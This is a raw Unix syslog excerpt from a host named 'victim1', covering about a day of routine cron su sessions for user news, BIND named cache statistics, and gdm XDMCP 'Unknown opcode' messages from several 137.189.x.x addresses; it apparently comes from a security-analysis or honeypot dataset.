Jan 11 07:01:01 victim1 PAM_pwdb[16712]: (su) session closed for user news
Jan 11 07:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 07:21:58 victim1 named[385]: USAGE 947546518 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 07:21:58 victim1 named[385]: NSTATS 947546518 944119308
Jan 11 07:21:58 victim1 named[385]: XSTATS 947546518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 07:28:38 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 07:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 08:01:00 victim1 PAM_pwdb[16773]: (su) session opened for user news by (uid=0)
Jan 11 08:01:01 victim1 PAM_pwdb[16773]: (su) session closed for user news
Jan 11 08:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 08:21:58 victim1 named[385]: USAGE 947550118 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 08:21:58 victim1 named[385]: NSTATS 947550118 944119308
Jan 11 08:21:58 victim1 named[385]: XSTATS 947550118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 08:28:37 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 08:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 08:53:05 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 11 08:53:05 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 11 09:01:01 victim1 PAM_pwdb[16834]: (su) session opened for user news by (uid=0)
Jan 11 09:01:03 victim1 PAM_pwdb[16834]: (su) session closed for user news
Jan 11 09:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 09:21:58 victim1 named[385]: USAGE 947553718 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 09:21:58 victim1 named[385]: NSTATS 947553718 944119308
Jan 11 09:21:58 victim1 named[385]: XSTATS 947553718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 09:28:37 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 09:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 10:01:00 victim1 PAM_pwdb[16895]: (su) session opened for user news by (uid=0)
Jan 11 10:01:01 victim1 PAM_pwdb[16895]: (su) session closed for user news
Jan 11 10:09:42 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 10:09:42 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 10:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 10:21:58 victim1 named[385]: USAGE 947557318 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 10:21:58 victim1 named[385]: NSTATS 947557318 944119308
Jan 11 10:21:58 victim1 named[385]: XSTATS 947557318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 10:28:37 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 10:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 10:51:45 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.96.138
Jan 11 10:55:25 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.96.138
Jan 11 10:58:10 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.96.138
Jan 11 11:01:00 victim1 PAM_pwdb[16958]: (su) session opened for user news by (uid=0)
Jan 11 11:01:01 victim1 PAM_pwdb[16958]: (su) session closed for user news
Jan 11 11:09:42 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 11:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 11:21:58 victim1 named[385]: USAGE 947560918 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 11:21:58 victim1 named[385]: NSTATS 947560918 944119308
Jan 11 11:21:58 victim1 named[385]: XSTATS 947560918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 11:28:37 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 11:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 12:01:00 victim1 PAM_pwdb[17019]: (su) session opened for user news by (uid=0)
Jan 11 12:01:01 victim1 PAM_pwdb[17019]: (su) session closed for user news
Jan 11 12:09:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 12:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 12:21:58 victim1 named[385]: USAGE 947564518 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 12:21:58 victim1 named[385]: NSTATS 947564518 944119308
Jan 11 12:21:58 victim1 named[385]: XSTATS 947564518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 12:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 13:01:02 victim1 PAM_pwdb[17080]: (su) session opened for user news by (uid=0)
Jan 11 13:01:05 victim1 PAM_pwdb[17080]: (su) session closed for user news
Jan 11 13:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 13:21:58 victim1 named[385]: USAGE 947568118 944119308 CPU=0.89u/2.97s CHILDCPU=0u/0s
Jan 11 13:21:58 victim1 named[385]: NSTATS 947568118 944119308
Jan 11 13:21:58 victim1 named[385]: XSTATS 947568118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 13:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 13:59:02 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 14:01:00 victim1 PAM_pwdb[17141]: (su) session opened for user news by (uid=0)
Jan 11 14:01:01 victim1 PAM_pwdb[17141]: (su) session closed for user news
Jan 11 14:02:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 14:02:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 14:16:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 11 14:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 14:21:58 victim1 named[385]: USAGE 947571718 944119308 CPU=0.89u/2.99s CHILDCPU=0u/0s
Jan 11 14:21:58 victim1 named[385]: NSTATS 947571718 944119308
Jan 11 14:21:58 victim1 named[385]: XSTATS 947571718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 14:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 15:01:01 victim1 PAM_pwdb[17204]: (su) session opened for user news by (uid=0)
Jan 11 15:01:02 victim1 PAM_pwdb[17204]: (su) session closed for user news
Jan 11 15:02:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 15:10:09 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 15:10:09 victim1 last message repeated 2 times
Jan 11 15:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 15:21:58 victim1 named[385]: USAGE 947575318 944119308 CPU=0.89u/2.99s CHILDCPU=0u/0s
Jan 11 15:21:58 victim1 named[385]: NSTATS 947575318 944119308
Jan 11 15:21:58 victim1 named[385]: XSTATS 947575318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 15:25:58 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 15:26:20 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 15:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 16:01:00 victim1 PAM_pwdb[17265]: (su) session opened for user news by (uid=0)
Jan 11 16:01:03 victim1 PAM_pwdb[17265]: (su) session closed for user news
Jan 11 16:02:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 16:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 16:21:58 victim1 named[385]: USAGE 947578918 944119308 CPU=0.89u/2.99s CHILDCPU=0u/0s
Jan 11 16:21:58 victim1 named[385]: NSTATS 947578918 944119308
Jan 11 16:21:58 victim1 named[385]: XSTATS 947578918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 16:22:36 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 16:33:54 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 11 16:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 17:01:00 victim1 PAM_pwdb[17324]: (su) session opened for user news by (uid=0)
Jan 11 17:01:01 victim1 PAM_pwdb[17324]: (su) session closed for user news
Jan 11 17:02:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 17:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 17:21:58 victim1 named[385]: USAGE 947582518 944119308 CPU=0.89u/2.99s CHILDCPU=0u/0s
Jan 11 17:21:58 victim1 named[385]: NSTATS 947582518 944119308
Jan 11 17:21:58 victim1 named[385]: XSTATS 947582518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 17:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 18:01:00 victim1 PAM_pwdb[17383]: (su) session opened for user news by (uid=0)
Jan 11 18:01:01 victim1 PAM_pwdb[17383]: (su) session closed for user news
Jan 11 18:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 18:21:58 victim1 named[385]: USAGE 947586118 944119308 CPU=0.89u/2.99s CHILDCPU=0u/0s
Jan 11 18:21:58 victim1 named[385]: NSTATS 947586118 944119308
Jan 11 18:21:58 victim1 named[385]: XSTATS 947586118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 18:23:43 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 18:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 19:01:01 victim1 PAM_pwdb[17442]: (su) session opened for user news by (uid=0)
Jan 11 19:01:03 victim1 PAM_pwdb[17442]: (su) session closed for user news
Jan 11 19:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 19:21:58 victim1 named[385]: USAGE 947589718 944119308 CPU=0.89u/2.99s CHILDCPU=0u/0s
Jan 11 19:21:58 victim1 named[385]: NSTATS 947589718 944119308
Jan 11 19:21:58 victim1 named[385]: XSTATS 947589718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 19:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 19:40:48 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 20:01:01 victim1 PAM_pwdb[17501]: (su) session opened for user news by (uid=0)
Jan 11 20:01:01 victim1 PAM_pwdb[17501]: (su) session closed for user news
Jan 11 20:09:02 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 20:09:02 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 20:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 20:21:58 victim1 named[385]: USAGE 947593318 944119308 CPU=0.89u/2.99s CHILDCPU=0u/0s
Jan 11 20:21:58 victim1 named[385]: NSTATS 947593318 944119308
Jan 11 20:21:58 victim1 named[385]: XSTATS 947593318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 20:40:49 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 20:50:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 20:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 21:01:01 victim1 PAM_pwdb[17560]: (su) session opened for user news by (uid=0)
Jan 11 21:01:04 victim1 PAM_pwdb[17560]: (su) session closed for user news
Jan 11 21:09:02 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 21:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 21:21:58 victim1 named[385]: USAGE 947596918 944119308 CPU=0.91u/3.02s CHILDCPU=0u/0s
Jan 11 21:21:58 victim1 named[385]: NSTATS 947596918 944119308
Jan 11 21:21:58 victim1 named[385]: XSTATS 947596918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 21:40:49 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 21:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 22:01:01 victim1 PAM_pwdb[17619]: (su) session opened for user news by (uid=0)
Jan 11 22:01:02 victim1 PAM_pwdb[17619]: (su) session closed for user news
Jan 11 22:09:02 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 22:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 22:21:58 victim1 named[385]: USAGE 947600518 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 11 22:21:58 victim1 named[385]: NSTATS 947600518 944119308
Jan 11 22:21:58 victim1 named[385]: XSTATS 947600518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 22:40:50 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 22:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 23:01:00 victim1 PAM_pwdb[17678]: (su) session opened for user news by (uid=0)
Jan 11 23:01:01 victim1 PAM_pwdb[17678]: (su) session closed for user news
Jan 11 23:09:02 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 23:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 23:21:58 victim1 named[385]: USAGE 947604118 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 11 23:21:58 victim1 named[385]: NSTATS 947604118 944119308
Jan 11 23:21:58 victim1 named[385]: XSTATS 947604118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 23:40:51 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 11 23:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 00:01:00 victim1 PAM_pwdb[17737]: (su) session opened for user news by (uid=0)
Jan 12 00:01:02 victim1 PAM_pwdb[17737]: (su) session closed for user news
Jan 12 00:09:02 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 00:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 00:21:58 victim1 named[385]: USAGE 947607718 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 00:21:58 victim1 named[385]: NSTATS 947607718 944119308
Jan 12 00:21:58 victim1 named[385]: XSTATS 947607718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 00:40:51 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 00:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 01:01:01 victim1 PAM_pwdb[17796]: (su) session opened for user news by (uid=0)
Jan 12 01:01:02 victim1 PAM_pwdb[17796]: (su) session closed for user news
Jan 12 01:09:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 01:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 01:21:58 victim1 named[385]: USAGE 947611318 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 01:21:58 victim1 named[385]: NSTATS 947611318 944119308
Jan 12 01:21:58 victim1 named[385]: XSTATS 947611318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 01:40:51 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 01:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 02:01:01 victim1 PAM_pwdb[17855]: (su) session opened for user news by (uid=0)
Jan 12 02:01:03 victim1 PAM_pwdb[17855]: (su) session closed for user news
Jan 12 02:09:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 02:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 02:21:58 victim1 named[385]: USAGE 947614918 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 02:21:58 victim1 named[385]: NSTATS 947614918 944119308
Jan 12 02:21:58 victim1 named[385]: XSTATS 947614918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 02:40:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 02:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 03:01:01 victim1 PAM_pwdb[17914]: (su) session opened for user news by (uid=0)
Jan 12 03:01:02 victim1 PAM_pwdb[17914]: (su) session closed for user news
Jan 12 03:09:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 03:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 03:21:58 victim1 named[385]: USAGE 947618518 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 03:21:58 victim1 named[385]: NSTATS 947618518 944119308
Jan 12 03:21:58 victim1 named[385]: XSTATS 947618518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 03:40:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 03:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 04:01:00 victim1 PAM_pwdb[17973]: (su) session opened for user news by (uid=0)
Jan 12 04:01:01 victim1 PAM_pwdb[17973]: (su) session closed for user news
Jan 12 04:02:01 victim1 PAM_pwdb[18013]: (su) session opened for user news by (uid=0)
Jan 12 04:02:57 victim1 PAM_pwdb[18013]: (su) session closed for user news
Jan 12 04:07:01 victim1 PAM_pwdb[18486]: (su) session opened for user news by (uid=0)
Jan 12 04:07:03 victim1 PAM_pwdb[18486]: (su) session closed for user news
Jan 12 04:09:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 04:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 04:21:58 victim1 named[385]: USAGE 947622118 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 04:21:58 victim1 named[385]: NSTATS 947622118 944119308
Jan 12 04:21:58 victim1 named[385]: XSTATS 947622118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 04:40:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 04:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 05:01:01 victim1 PAM_pwdb[18590]: (su) session opened for user news by (uid=0)
Jan 12 05:01:05 victim1 PAM_pwdb[18590]: (su) session closed for user news
Jan 12 05:09:01 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 05:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 05:21:58 victim1 named[385]: USAGE 947625718 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 05:21:58 victim1 named[385]: NSTATS 947625718 944119308
Jan 12 05:21:58 victim1 named[385]: XSTATS 947625718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 05:40:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 05:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 06:01:00 victim1 PAM_pwdb[18649]: (su) session opened for user news by (uid=0)
Jan 12 06:01:02 victim1 PAM_pwdb[18649]: (su) session closed for user news
Jan 12 06:09:00 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 06:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 06:21:58 victim1 named[385]: USAGE 947629318 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 06:21:58 victim1 named[385]: NSTATS 947629318 944119308
Jan 12 06:21:58 victim1 named[385]: XSTATS 947629318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 06:40:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 06:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 07:01:01 victim1 PAM_pwdb[18708]: (su) session opened for user news by (uid=0)
Jan 12 07:01:02 victim1 PAM_pwdb[18708]: (su) session closed for user news
Jan 12 07:09:00 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 07:21:58 victim1 named[385]: Cleaned cache of 0 RRs
